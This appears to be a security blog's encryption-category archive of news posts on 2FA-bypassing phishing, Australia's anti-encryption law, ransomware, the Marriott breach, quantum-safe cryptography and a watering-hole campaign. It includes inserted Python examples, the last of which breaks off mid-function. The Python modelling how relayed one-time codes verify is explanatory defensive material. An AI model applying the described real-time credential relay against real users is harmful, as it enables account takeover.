Category Archives: Encryption

Iranian Phishers Bypass 2fa Protections Offered By Yahoo Mail, Gmail

An anonymous reader quotes a report from Ars Technica: A recent phishing campaign targeting U.S. government officials, activists, and journalists is notable for using a technique that allowed the attackers to bypass two-factor authentication protections offered by services such as Gmail and Yahoo Mail, researchers said Thursday. The event underscores the risks of 2fa that relies on one-tap logins or one-time passwords, particularly if the latter are sent in SMS messages to phones. Attackers working on behalf of the Iranian government collected detailed information on targets and used that knowledge to write spear-phishing emails that were tailored to the targets' level of operational security, researchers with security firm Certfa Lab said in a blog post. The emails contained a hidden image that alerted the attackers in real time when targets viewed the messages. When targets entered passwords into a fake Gmail or Yahoo security page, the attackers would almost simultaneously enter the credentials into a real login page. In the event targets' accounts were protected by 2fa, the attackers redirected targets to a new page that requested a one-time password. "In other words, they check victims' usernames and passwords in realtime on their own servers, and even if 2 factor authentication such as text message, authenticator app or one-tap login are enabled they can trick targets and steal that information too," Certfa Lab researchers wrote. "We've seen [it] tried to bypass 2fa for Google Authenticator, but we are not sure they've managed to do such a thing or not," the Certfa representative wrote. "For sure, we know hackers have bypassed 2fa via SMS."

Read more of this story at Slashdot.
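The mechanism the Certfa researchers describe is easy to see in code: a one-time password from an authenticator app is a function of the shared secret and the clock only, so nothing in the six digits records which site the user typed them into, and a code entered on a look-alike page verifies just as well when forwarded to the real service inside its validity window. The example below is added here and is not code from the Certfa report, Ars Technica or Slashdot. It models the relay with a minimal RFC 6238 TOTP implementation, and then, as an illustration the page itself does not discuss, contrasts it with a hypothetical origin-bound challenge in which the user's device signs the server's nonce together with the origin it is actually connected to. The secret, device key and origins are constructed sample values.

```python
"""Why relayable second factors fail against real-time phishing (added example).

Two toy verifiers:
  * totp / verify_totp: RFC 6238 TOTP with HMAC-SHA1 and 30-second steps, the
    kind of code an authenticator app produces. The code is independent of the
    page it was typed into, so it can be forwarded to the real service.
  * sign_challenge / verify_challenge: a HYPOTHETICAL origin-bound factor (not
    from the page) where the device signs nonce||origin. A response produced on
    a look-alike origin does not verify at the real origin.
"""
import hashlib
import hmac
import secrets
import struct

STEP_SECONDS = 30


def totp(secret: bytes, unix_time: int, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) for the 30-second step containing unix_time."""
    counter = unix_time // STEP_SECONDS
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def verify_totp(secret: bytes, code: str, unix_time: int, window: int = 1) -> bool:
    """Server-side check: accept the current step and +/- `window` neighbouring steps."""
    return any(
        hmac.compare_digest(totp(secret, unix_time + d * STEP_SECONDS), code)
        for d in range(-window, window + 1)
    )


def relayed_totp_verifies(secret: bytes, typed_at: int, relayed_at: int) -> bool:
    """Model of the campaign in the article: the victim types a code into a
    look-alike page at `typed_at`; the same six digits are forwarded to the real
    service at `relayed_at`. The real verifier has no way to tell where the code
    was typed, so it accepts the code for as long as the window is open."""
    code = totp(secret, typed_at)
    return verify_totp(secret, code, relayed_at)


def sign_challenge(device_key: bytes, nonce: bytes, origin: str) -> str:
    """HYPOTHETICAL origin-bound factor: the device signs the server nonce
    together with the origin it is actually talking to (constructed illustration)."""
    return hmac.new(device_key, nonce + b"|" + origin.encode(), hashlib.sha256).hexdigest()


def verify_challenge(device_key: bytes, nonce: bytes, expected_origin: str, response: str) -> bool:
    """The real service recomputes the signature over ITS OWN origin."""
    return hmac.compare_digest(sign_challenge(device_key, nonce, expected_origin), response)


def relayed_challenge_verifies(device_key: bytes, real_origin: str, seen_origin: str) -> bool:
    """Same relay, but against the origin-bound factor: the nonce is passed
    through unchanged, yet the device binds the origin it sees, so the response
    only verifies when seen_origin equals real_origin."""
    nonce = secrets.token_bytes(16)                       # issued by the real service
    response = sign_challenge(device_key, nonce, seen_origin)
    return verify_challenge(device_key, nonce, real_origin, response)


if __name__ == "__main__":
    # Constructed sample values; the secret is the RFC 6238 test-vector seed.
    secret = b"12345678901234567890"
    print("TOTP at t=59:", totp(secret, 59))                              # 287082
    print("relayed TOTP accepted 10 s later:", relayed_totp_verifies(secret, 1000, 1010))
    print("relayed TOTP accepted 2 min later:", relayed_totp_verifies(secret, 1000, 1120))
    print("origin-bound response relayed from look-alike accepted:",
          relayed_challenge_verifies(b"device-key", "https://accounts.example",
                                     "https://accounts-example.test"))
```

The first two printed results are the whole story of the bypass: the verifier's only defence is the 30-second window, which is more than enough time for an operator who is forwarding credentials as they arrive. The last result shows the property a phishing-resistant factor needs: the proof must be bound to the origin the user is actually on, not merely to a secret and a clock.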

Cybersecurity Tools That Every Business Should Consider in 2019

Businesses ignoring cyber security has become a thing of the past. With the sudden increase in cyber-attacks and data breaches, cybersecurity remains at the front of many business leaders’ minds.

The post Cybersecurity Tools That Every Business Should Consider in 2019 appeared first on The Cyber Security Place.

New Australian Backdoor Law

Last week, Australia passed a law giving the government the ability to demand backdoors in computers and communications systems. Details are still to be defined, but it's really bad.

Note: Many people e-mailed me to ask why I haven't blogged this yet. One, I was busy with other things. And two, there's nothing I can say that I haven't said many times before.

If there are more good links or commentary, please post them in the comments.

EDITED TO ADD (12/13): The Australian government response is kind of embarrassing.

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal!

WhatsApp, Signal, and Telegram have all been around for a while. Though a lot of instant messaging apps were already

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal! on Latest Hacking News.

What Happens When Victims Pay Ransomware Attackers?

For many hackers around the globe, ransomware infections have become a lucrative business. Although these types of malware samples have been around for years now, they continue to spur success – and high monetary profits – for attackers.

In fact, according to a statement from U.S. Deputy Attorney General Rod Rosenstein during the 2017 Cambridge Cyber Summit, ransomware attacks now impact over 100,000 endpoints on a daily basis. The severity of these infections and the frequency at which victims pay up on ransom demands has enabled attackers to rake in nearly $1 billion in successful payments, Government Technology reported.

However, not every attack is the same, and even in cases when victims pay hackers’ demands, access to data is not always returned.

To pay or not to pay?

When a ransomware notification appears on-screen, there are numerous questions and considerations that immediately jump to mind. How will the organization support daily operations? How will users access important files and data? Are there backups in place that the business can fall back on?

One of the top questions, though, is whether or not to pay the ransom.

In 2016, the FBI, which is keeping a close eye on the spread and severity of ransomware infections, noted that victims shouldn’t give in to demands and should not pay attackers’ ransoms, Forbes reported. As demonstrated by Kaspersky Labs’ data, this advice is sound, as approximately one in every five companies that fall victim to an attack and pay the ransom do not receive the promised decryption key.

In other words, businesses are out money and are not returned access to their critical applications, files and data.

“Unfortunately, however, as is the case with most ransomware attacks, the stakes of losing years worth of important data is always quite high and the ransom demanded usually very small, leading most victims to give in to the attacker’s demands before even reaching out to law enforcement,” explained Forbes contributor Harold Stark.

Let’s examine a few real-world ransomware infection cases, and what can happen when victims do decide to pay attackers.

Numerous businesses that fall victim to cyberattacks often do not receive the promised decryption key.

Indiana hospital pays $55,000 after SamSam infection

According to ZDNet, an Indiana-based hospital, Hancock Health, elected to pay $55,000, or the equivalent value of 4 Bitcoin at the time, after its systems were seized by ransomware sample SamSam. Despite immediate awareness and notification by employee end users, the hospital’s IT team wasn’t able to stem the spread of the pervasive ransomware sample.

All told, the infection impacted nearly all of the hospital’s key IT systems, and users were locked out of email, the electronic health record system and other internal platforms. This includes more than 1,400 files, which were encrypted by attackers and renamed as “I’m sorry.”

The sample used in this case, SamSam, seeks out vulnerable servers, and is able to spread to other machines within the network, enabling a quick and widely-scoped attack. And as ZDNet contributor Charlie Osborne pointed out, hackers will make decisions about the ransom amount based on how far SamSam spreads within the victim’s infrastructure.

“Known for use in targeted rather than opportunistic attacks, SamSam can be used in web shell deployment, batch script usage for running the malware on multiple machines, remote access and tunneling,” Osborne explained.

After the initial infection and ransom demand, hospital administrators were given a week to pay the ransom or risk losing their files and data forever. Although the organization did have backups in place – a key data security best practice – it elected to pay the ransom. IT administrators at the hospital explained that while the backups could have been leveraged to recover the data and files encrypted by hackers, this process would have taken days, or even weeks. What’s more, after shifting certain work activity to a manual, pen-and-paper basis for two days, the hospital simply needed a quick resolution.

Unfortunately, the hospital is far from the only organization to be infected with the pervasive SamSam sample – in the spring of 2018, Trend Micro reported on a case involving the city of Atlanta. During that attack, the city’s local services, including citizen-facing platforms used to pay bills or access court data, were made unavailable. In this instance, hackers demanded $6,800 to decrypt a single computer or $51,000 for a full decryption. City officials worked with their internal IT team and Microsoft to restore access.

Kansas hospital hit with second infection after paying ransom

While the Indiana hospital infected by SamSam was able to regain its files and data after paying hackers’ ransom, not every organization is so lucky.

According to HealthcareITNews contributor Bill Siwicki, Kansas Heart Hospital in Wichita was the victim of a ransomware attack in mid-2016. While patient data contained within the hospital’s electronic health records system was not impacted and daily operations were able to continue, officials decided to pay the ransom.

Unlike the Hancock Health case, though, access to files and data was not returned, even after the “small amount” in ransom was sent to attackers. Instead, hackers demanded a second ransom and systems impacted by the initial infection remained locked.

“Kansas Heart Hospital did not pay the second ransom request and said that along with consultants it did not think that would be a wise move, even though attackers still appear to have some of their data locked,” Siwicki wrote.

This hospital’s experience isn’t as unique as it might seem, though. Health care security expert Ryan Witt told Siwicki that hackers will often take part in a “tried and tested dance” wherein they demand a small ransom amount, and then demand a second, higher amount once the first is paid.

“Demands for funds are soaring, and the problem is organizations are paying,” Witt noted. “Ransomware will get worse before it gets better.”

Addressing ransomware: Trend Micro’s File Decryptor

As these cases have shown, paying up in the hopes that a ransomware attack will end is not the best strategy. It’s imperative that organizations have backups of all of their critical files and data, and that these are stored in the cloud or another separate, off-site location. In this way, should an attack take place, IT admins can recover using the company’s backups.

In addition, Trend Micro has established a solution specifically to address the issue of ransomware attacks: the Trend Micro Ransomware File Decryptor. This tool works to decrypt and restore files and data impacted by certain ransomware families. As of May 2017, limited decryption support was added for WannaCry, following the widespread impact of the sample.

To find out more about Trend Micro’s File Decryptor, check out this guide. And visit our blog to learn more about why ransomware attacks continue to be successful for hackers.

The post What Happens When Victims Pay Ransomware Attackers? appeared first on .

Australia: Parliament passes anti-encryption bill

The Parliament of Australia has passed the Assistance and Access Bill 2018, which allows Australian authorities to pressure communication providers and tech companies into giving them access to encrypted electronic communications, all in the name of fighting crime and terrorism. Interception capabilities The companies will be forced to use interception capabilities they already have or to build new ones – although the government claims that the authorities can’t use these powers “to introduce so-called ‘backdoors’ … More

The post Australia: Parliament passes anti-encryption bill appeared first on Help Net Security.

Australia Passes Anti-Encryption Bill—Here’s Everything You Need To Know

Australia's House of Representatives has finally passed the "Telecommunications Assistance and Access Bill 2018," also known as the Anti-Encryption Bill, on Thursday that would now allow law enforcement to force Google, Facebook, WhatsApp, Signal, and other tech giants to help them access encrypted communications. The Australian government argues the new legislation is important for national

Days After Massive Breach, Marriott Customers Await Details

Nearly a week after Marriott disclosed a massive breach of its Starwood reservation system, customers complain that the company has not communicated with them to tell them whether they are affected. Marriott says it is sending “rolling” emails to hundreds of millions of victims. An estimated 500 million Marriott International customers...

Australia Passes Anti-Encryption Laws [Update]

Earlier today, Australia's House of Representatives passed the Assistance and Access Bill. The Anti-Encryption Bill, as it is known, would allow the nation's police and anti-corruption forces to ask, before forcing, internet companies, telcos, messaging providers, or anyone deemed necessary, to break into whatever content agencies they want access to. "While the Bill can still be blocked by the Senate -- Australian Twitter has been quite vocal over today's proceedings, especially in regards to the [Australian Labor Party's] involvement," reports Gizmodo. ZDNet highlights the key findings from a report from the Parliamentary Joint Committee on Intelligence and Security (PJCIS): The threshold for industry assistance is recommended to be lifted to offenses with maximum penalties in excess of three years; Technical Assistance Notices (TANs) and Technical Capability Notices (TCNs) will be subjected to statutory time limits, as well as any extension, renewal, or variation to the notices; the systemic weakness clause to apply to all listing acts and things; and the double-lock mechanism of approval from Attorney-General and Minister of Communications will be needed, with the report saying the Communications Minister will provide "a direct avenue for the concerns of the relevant industry to be considered as part of the approval process." The report's recommendations also call for a review after 18 months of the Bill coming into effect by the Independent National Security Legislation Monitor; TANs issued by state and territory police forces to be approved by the Australian Federal Police commissioner; companies issued with notices are able to appeal to the Attorney-General to disclose publicly the fact they are issued a TCN; and the committee will review the passed legislation in the new year and report by April 3, 2019, right around when the next election is expected to be called.
In short: "Testimony from experts has been ignored; actual scrutiny of the Bill is kicked down the road for the next Parliament; Labor has made sure it is not skewered by the Coalition and seen to be voting against national security legislation on the floor of Parliament; and any technical expert must have security clearance equal to Australia's spies, i.e. someone who has been in the spy sector." Further reading: Australia Set To Spy on WhatsApp Messages With Encryption Law. UPDATE: The encryption bill has passed the Senate with a final vote of 44-12, with Labor and the Coalition voting for it. "Australia's security and intelligence agencies now have legal authority to force encryption services to break the encryptions," reports The Guardian. Story is developing...

Read more of this story at Slashdot.

Quantum Computers Pose a Security Threat That We’re Still Totally Unprepared For

An anonymous reader quotes a report from MIT Technology Review: The world relies on encryption to protect everything from credit card transactions to databases holding health records and other sensitive information. A new report from the U.S. National Academies of Sciences, Engineering, and Medicine says we need to speed up preparations for the time when super-powerful quantum computers can crack conventional cryptographic defenses. The experts who produced the report, which was released today, say widespread adoption of quantum-resistant cryptography "will be a long and difficult process" that "probably cannot be completed in less than 20 years." It's possible that highly capable quantum machines will appear before then, and if hackers get their hands on them, the result could be a security and privacy nightmare. Today's cyberdefenses rely heavily on the fact that it would take even the most powerful classical supercomputers almost unimaginable amounts of time to unravel the cryptographic algorithms that protect our data, computer networks, and other digital systems. But computers that harness quantum bits, or qubits, promise to deliver exponential leaps in processing power that could break today's best encryption. The report cites an example of encryption that protects the process of swapping identical digital keys between two parties, who use them to decrypt secure messages sent to one another. A powerful quantum computer could crack RSA-1024, a popular algorithmic defense for this process, in less than a day. The U.S., Israel and others are working to develop standards for quantum-proof cryptographic algorithms, but they may not be ready or widely adopted by the time quantum computers arrive. "[I]t will take at least a couple of decades to get quantum-safe cryptography broadly in place," the report says in closing. "If that holds, we're going to have to hope it somehow takes even longer before a powerful quantum computer ends up in a malicious hacker's hands."

Read more of this story at Slashdot.

Australia Set To Spy on WhatsApp Messages With Encryption Law

Australia is set to give its police and intelligence agencies the power to access encrypted messages on platforms such as WhatsApp, becoming the latest country to face down privacy concerns in the name of public safety. From a report: Amid protests from companies such as Facebook and Google, the government and main opposition struck a deal on Tuesday that should see the legislation passed by parliament this week. Under the proposed powers, technology companies could be forced to help decrypt communications on popular messaging apps, or even build new functionality to help police access data. Prime Minister Scott Morrison has said the legislation is needed to help foil terrorist attacks and organized crime. Critics say it is flawed and could undermine security across the Internet, jeopardizing activities from online voting to market trading and data storage.

Read more of this story at Slashdot.

Marriott Data Breach Impacts Personal Information of up to 500 Million Guests

Marriott disclosed a breach of its Starwood reservation database that potentially affects an estimated 500 million guests.

Details of the Marriott data breach, which goes back to 2014, have been reported to law enforcement and regulatory authorities, according to the company. Marriott said it received an initial alert on Sept. 8 that an unauthorized third party had attempted to access the Starwood database. Further investigation revealed that an unknown entity copied and encrypted guest information and also attempted to steal the database. The public first learned of the data breach when it was disclosed on Nov. 30.

What Personal Information Was Stolen?

Although the company stated that it had not finished decrypting the copied information at the time of disclosure, it confirmed that the personally identifiable information (PII) of approximately 327 million people might have been compromised. The data includes payment card numbers and expiration dates, though it is not yet known if the two keys needed to decrypt the Advanced Encryption Standard (AES-128) protocol used to protect this information were also stolen.

In addition to payment card information, threat actors also accessed the 327 million customers’ names, passport numbers, Starwood Preferred Guest account information, dates of birth, genders and email addresses. For the remaining guests, the information was limited to names and mailing or email addresses.

The Marriott incident is one of the largest in history, and could be one of the first opportunities for European Union regulators to flex their General Data Protection Regulation (GDPR) muscles. The GDPR was enacted in late May, promising severe fines for violations of data privacy and disclosure.

Response to the Marriott Data Breach

Since the Marriott data breach was disclosed, two class-action lawsuits seeking damages for the exposure of personal information have been filed. Multiple news outlets, including The New York Times, have reported that the Federal Bureau of Investigation (FBI) is tracking the situation, and investigations have been launched by attorneys general in several states.

Customers affected by the Marriott data breach can access a dedicated website and call center with any questions. The company is also offering guests a free year of the WebWatcher monitoring software to help identify any misuse of personal information.

Of course, Marriott is far from alone in dealing with large data breaches. According to Ponemon’s “2018 Cost of a Data Breach Study,” the number of mega breaches — those involving more than 1 million records — has nearly doubled from 2013 to 2017.

Sources: Marriott, ZDNet, The New York Times

The post Marriott Data Breach Impacts Personal Information of up to 500 Million Guests appeared first on Security Intelligence.

Cross-Industry Approaches to Managing Potentially Catastrophic Cyber Risks

The other day I was reading a history of the events leading up to the Challenger space shuttle disaster, which got me thinking of the ways different industries manage risk. In that tragic case, the design of the O-ring seals in the right rocket booster presented a known risk that nontechnical executives downplayed and did not fully comprehend when they made the decision to move forward with the launch.

Similarly, the security industry contends with a range of cyber risks that can cause catastrophic damage to a business, such as large-scale disclosure of personal data, failure of power infrastructure caused by rogue threat actors and the interruption of critical emergency service systems.

Having worked with many clients in various industries over the years, I have observed myriad approaches to risk management. But the fact remains that many organizations are still immature in this area because best practices are not typically shared across industries. Organizations are often wed to their method of managing risk and do not look outside for ways to improve.

Assurance and Traceability Are Key

In the 1990s — around the time when I first completed a security evaluation of the Advanced Interactive eXecutive (AIX) operating system — the Information Technology Security Evaluation Criteria (ITSEC) was considered a best practice in the U.K. Today, we have the Common Criteria for Information Technology Security Evaluation (CC) and the companion Common Methodology for Information Technology Security Evaluation (CEM).

The security evaluation process considers the functionality of security controls and the assurance of those controls. Depending on what the solution protects, there is a requirement for increased levels of assurance through additional documentation and testing — with an associated cost.

To provide assurance, security requirements were traced from the initial requirements through the different levels of design to testing in a traceability matrix. Outside the public sector, the architectural thinking process in use today applies some traceability, but without rigor and without considering the differing levels of detail required depending on the risk to the business.

Today, the “NASA Systems Engineering Handbook” highlights the need for bidirectional traceability of requirements in solutions.

The Difference Between Verification and Validation

In pharmaceuticals, there is the concept of verification and validation of a solution. Verification means ensuring that the solution is built according to the requirements and design. Traceability supports this principle — together with reviews of the solution — to ensure that functionality has been implemented and will be tested.

Validation means ensuring the solution meets users’ needs. In security, it’s not just testing that the product will enforce the control, but making sure the users’ needs are met within the environment where it is being used. Having a security control that requires a user to log in every 30 minutes may improve security, but if the user takes 20 minutes to log in through another three logins and can only perform 10 minutes of productive work, it does not meet the needs of the user or the business.

Today, NASA uses the verification and validation approach in its Systems Engineering Handbook, and I am sure other industries can make use of these principles.

Minimize Risk With a Layered Defense Strategy

Financial and banking institutions are increasingly adopting approaches to risk management that outline three lines of defense to ensure ownership, oversight and governance. The second line of defense looks at the overall aggregate risk for the organization. In the case of the space shuttle program, the challenge was how to effectively communicate that the material risks could be catastrophic.

Barrier risk models such as the bowtie model originated in the oil and gas industry in the 1990s and have since been adopted by the military and aviation to visualize risk. We know that incidents will happen, so it’s important to pay the same level of attention to the preparation and prevention controls as to the detection, response and recovery controls. At the center of the bowtie model is the catastrophic event that may happen, with the controls preventing the event from happening on the left, and the controls that contain the consequences of the event on the right.

Combining the five stages of the NIST Cybersecurity Framework with the bowtie model is a great way to represent the depth and strength of security controls to employees with a less technical background. It also allows engineering staff to better demonstrate that additional controls are not required when the current security controls are appropriate to the risk.

There are many different ways to represent the controls. Below is an example for data-at-rest encryption:

Bow Tie Diagram

How Strong and Mature Are Your Security Controls?

Each of the controls an organization uses can have a different strength of mechanism. If I use the six-character password “123456,” it is very weak compared to one that is enforced by software when a password is changed. A single strong control is better than many controls that have a low strength of mechanism.

The context of how a security mechanism is implemented or deployed may also alter its strength. Using a large encryption key may be weakened by the randomness of the key, and inspecting a TLS session may weaken the effectiveness of encryption. Think about the context of the implementation.

Each control may also have a different level of maturity. If I use a firewall that has been installed without a formal design, without testing and with no documented procedures to manage the life cycle, the maturity is low with an increased likelihood that the controls will be inadequate. Having one very mature process that is enforced rigorously may be better than having many controls that are poorly maintained. Using the Capability Maturity Model Integration (CMMI) can help organizations assess the maturity of a process. Without the right balance of procedural, organizational and technical controls, the maturity may not be adequate.

Tips for Managing Cyber Risks

The next time you have a risk that is considered material to the operation of your business — especially one that could result in a catastrophic incident — consider what you can learn from how other industries manage risk. Below are some best practices for managing cyber risks:

  • Ensure traceability of controls with assurance appropriate to the risk.
  • Consider both verification and validation in the assurance of a solution.
  • Use multiple levels of risk review with three lines of defense.
  • Examine defense in depth with an appropriate strength of mechanism.
  • Assess and drive continuous improvement in the maturity of control mechanisms.

Last, but certainly not least, make sure you communicate these principles to staff and suppliers to get them on board and garner their support in managing risk effectively.

What is your industry’s primary security challenge?

The post Cross-Industry Approaches to Managing Potentially Catastrophic Cyber Risks appeared first on Security Intelligence.

Massive Marriott Breach Underscores Risk of overlooking Data Liability

The Marriott breach underscores how companies fail to price in the risk of poor data security. In the age of GDPR, that could be an expensive failure. 

The post Massive Marriott Breach Underscores Risk of overlooking Data Liability appeared first on The Security Ledger.

Marriott breach impacts 500 million customers: here’s what to do about it

Today Marriott disclosed a large-scale data breach impacting up to 500 million customers who have stayed at a Starwood-branded hotel within the last four years. While details of the breach are still sparse, Marriott stated that there was unauthorized access to a database tied to customer reservations stretching from 2014 to September 10, 2018.

For a majority of impacted customers (approximately 327 million), the breached data includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some of those guests, their credit card numbers and expiration dates were exposed; however, they were encrypted using the Advanced Encryption Standard (AES-128).

You can read more on impact to customers in Marriott’s statement here.

A root cause of the breach is currently unknown, but Marriott indicated that the intruders encrypted the information before exfiltrating the data. Brian Krebs reported that Starwood had disclosed its own breach in 2015, shortly after its acquisition by Marriott. At the time, Starwood said that its breach timeline extended back one year, to roughly November 2014. Incomplete remediation of breaches is extremely common, and when compounded by the asset management challenges introduced by mergers and acquisitions, seeing lateral movement and exfiltration after an initial hack is not unreasonable.

Starwood properties impacted are as follows:

  • Westin
  • Sheraton
  • The Luxury Collection
  • Four Points by Sheraton
  • W Hotels
  • St. Regis
  • Le Méridien
  • Aloft
  • Element
  • Tribute Portfolio
  • Design Hotels

What should you do about it?

If you’re a customer:

  • Change your Starwood Preferred Guest password immediately, ideally to a random one generated by a password manager of your choice.
  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering. Review emails supposedly from Marriott with an eagle eye.

If you’re a business looking for tips to prevent getting hit by a breach:

  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Marriott breach impacts 500 million customers: here’s what to do about it appeared first on Malwarebytes Labs.

How to Future-Proof Your Enterprise With Quantum-Safe Cryptography

Quantum computers are poised to solve currently intractable problems for traditional technology. At some point in the next 10 or 15 years, quantum computers may be powerful enough to put your data at risk by compromising your cryptography. Data protected by today’s encryption methods may become susceptible to decryption by the unprecedented processing power of the emerging quantum computer.

Act Today to Prepare for the Future

The urgency to act now is based on a data risk timeline. Data stored today may need to remain confidential or valid for up to 30 years. There are four factors that influence the data risk timeline:

  1. The strength of your current cryptographic algorithms. Weaker algorithms may be at risk before stronger algorithms. The challenge is to know your complete cryptographic inventory.
  2. The security time value of data being protected. How long must the data be protected throughout the life cycle of a product?
  3. Crypto-agility. How quickly can an enterprise upgrade existing cryptographic deployments? For some organizations, it may take years.
  4. The pace of quantum technology improvements.

What Is Quantum-Safe Cryptography?

Quantum-safe cryptography refers to algorithms that run on today’s classical computers but are secure against quantum adversaries. The implication is that we can protect data today.

IBM develops and standardizes quantum-safe cryptographic algorithms in an open and collaborative fashion. Cryptographic standards are important to facilitate the widespread and interoperable adoption of security. IBM believes that lattice-based cryptography has the best combination of quantum-resistant properties and is part of three lattice-based consortium submissions to the National Institute of Standards and Technology (NIST)'s call for post-quantum standards.

Why Crypto-Agility Is Crucial

Few enterprises know the full range of cryptographic solutions they have deployed. For some, it may take years to upgrade their cryptography, as with migrations from SHA-1 to SHA-2 or Triple Data Encryption Standard (TDES) to Advanced Encryption Standard (AES). The transition from today’s cryptography to quantum-safe technology offers an opportunity to rethink how applications consume cryptography. Cryptographic agility is a key aspect of cybersecurity, and organizations would be wise to leverage it as part of their quantum-safe journey.
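The four factors listed earlier combine into a simple test, usually attributed to Michele Mosca: if the years the data must stay secret plus the years a migration will take exceed the years until a capable quantum computer exists, the data is already at risk. The following is an added example, not code from the original post or from IBM, that applies that test to a constructed cryptographic inventory and ranks what to migrate first. The inventory entries, the fifteen-year quantum horizon and the key-length thresholds (public-key algorithms treated as broken outright; 256-bit symmetric keys and 384-bit digests required) are assumptions chosen for illustration, not a standard.

```python
"""Quantum data-risk triage for a cryptographic inventory.

Added example, not from the original post or IBM. Applies the four
factors from the text: algorithm strength, the security time value of the
data, crypto-agility (migration time) and the expected arrival of a
cryptographically relevant quantum computer. Inventory and thresholds are
assumptions for illustration.
"""
from dataclasses import dataclass

# Public-key algorithms are broken outright by Shor's algorithm, whatever
# the key size. Symmetric ciphers and hashes lose roughly half their
# security level to Grover's search, so length is what matters there.
# The thresholds below are a conservative assumption, not a standard.
SHOR_VULNERABLE = {"RSA", "DSA", "DH", "ECDSA", "ECDH", "ED25519", "X25519"}
GROVER_MIN_BITS = {"AES": 256, "CHACHA20": 256, "SHA2": 384, "SHA3": 384}


@dataclass(frozen=True)
class Asset:
    name: str
    algorithm: str        # e.g. "RSA", "AES"
    bits: int             # key size or digest length
    data_shelf_life: int  # years the protected data must stay confidential or valid
    migration_years: int  # years needed to replace this deployment


def is_quantum_weak(algorithm: str, bits: int) -> bool:
    """True if a quantum adversary would break this algorithm at this size."""
    alg = algorithm.upper()
    if alg in SHOR_VULNERABLE:
        return True
    return bits < GROVER_MIN_BITS.get(alg, 0)


def at_risk(asset: Asset, years_to_quantum: int) -> bool:
    """Mosca's inequality: data is exposed when shelf life plus migration
    time exceeds the time until a capable quantum computer exists."""
    if not is_quantum_weak(asset.algorithm, asset.bits):
        return False
    return asset.data_shelf_life + asset.migration_years > years_to_quantum


def triage(inventory, years_to_quantum):
    """(name, years of exposure) for every at-risk asset, worst first."""
    report = []
    for a in inventory:
        if at_risk(a, years_to_quantum):
            report.append((a.name, a.data_shelf_life + a.migration_years - years_to_quantum))
    return sorted(report, key=lambda r: r[1], reverse=True)


# Constructed inventory: the kind of entries a first cryptographic census turns up.
INVENTORY = [
    Asset("customer-db-backup", "AES", 128, 30, 2),
    Asset("tls-web-cert", "RSA", 2048, 1, 1),
    Asset("archive-signing", "ECDSA", 256, 25, 5),
    Asset("session-cache", "AES", 256, 1, 1),
]

if __name__ == "__main__":
    for name, exposure in triage(INVENTORY, years_to_quantum=15):
        print(f"{name}: exposed for {exposure} years")
```

Running it lists the two exposed assets with their years of exposure. The web certificate uses RSA, which is quantum-broken, yet is not at risk because it is replaced yearly; the signing deployment ranks high even with a shorter data lifetime because its migration takes five years. Triaging this way turns the inventory problem into a ranked work list rather than a single deadline.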

If you’re interested in setting up a Quantum Risk Assessment for your organization, please get in touch.

The post How to Future-Proof Your Enterprise With Quantum-Safe Cryptography appeared first on Security Intelligence.

OceanLotus Watering Hole Campaign Compromises 21 High-Profile Southeast Asian Websites

A watering hole campaign that has been active in Southeast Asia since September has compromised at least 21 websites, including those of government agencies and major media outlets.

Researchers attributed the attack to a threat group known as OceanLotus, which has been targeting foreign governments for approximately six years. Users who visited the compromised websites were redirected to a page controlled by the attackers. While the owners of the domains have since been informed of the watering hole attack, some of the sites still serve the injected scripts.

A Wider Watering Hole Than Usual

The traditional watering hole campaign strategy has focused on luring specific individuals by compromising URLs they’re known to use regularly, but the latest OceanLotus attack includes sites such as a popular Vietnamese newspaper, suggesting that a large number of people could be affected.

Over the course of a multiphase attack, OceanLotus injects a small piece of malicious JavaScript into a compromised site. That first-stage script opens a connection from the visitor's browser to an attacker-controlled server, which can then return additional scripts and, potentially, a payload. While the full extent of the watering hole campaign isn't clear, researchers speculated that the compromised websites could be used to conduct phishing schemes and steal confidential data.

Like many other threat groups, OceanLotus is focused on improving the sophistication of its attacks. The researchers noted, for example, that the group used a 1,024-bit RSA public key to protect the information exchanged between its server and visitors' devices from decryption by anyone observing the traffic. OceanLotus also purchased dozens of domains and servers, which it used to run the first and second stages of the attacks and make the URLs look legitimate.
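A site owner can catch the kind of injection described above by comparing what a page actually serves against what it is supposed to serve. The following is an added example, not code from the original article or from the research it summarizes: it extracts the script elements from fetched HTML, flags external scripts loaded from hosts outside a per-site allowlist, and flags inline scripts whose hash is not in a known-good set. The sample page, the allowlist and the hash set are constructed for the example.

```python
"""Flag injected scripts on a fetched page.

Added example, not from the original article or the research it covers.
Compares the <script> elements on a page against an allowlist of script
hosts and a set of known-good inline script hashes. Sample HTML, allowlist
and hash set are constructed.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def script_host(src, page_host):
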